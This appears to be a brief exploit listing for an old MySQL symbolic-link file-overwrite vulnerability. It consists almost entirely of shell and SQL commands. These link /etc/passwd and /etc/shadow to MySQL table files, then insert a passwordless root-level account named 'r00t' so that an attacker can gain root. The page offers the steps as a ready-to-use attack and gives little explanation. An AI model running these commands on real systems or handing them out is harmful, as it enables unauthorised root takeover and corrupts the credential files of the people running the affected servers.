|
|
MySQL Root Operation Symbolic Link File Overwriting Vulnerability
$ cd /var/tmp $ ln -s /etc/passwd gotcha.ISD $ ln -s /etc/shadow make_me_r00t.ISD $ mysql -u user -h localhost -p somepassword '../../tmp' create table gotcha(qqq varchar(255)); create table make_me_r00t(qqq varchar(255)); insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n'); insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n'); \q $ |
|
Privacy Statement |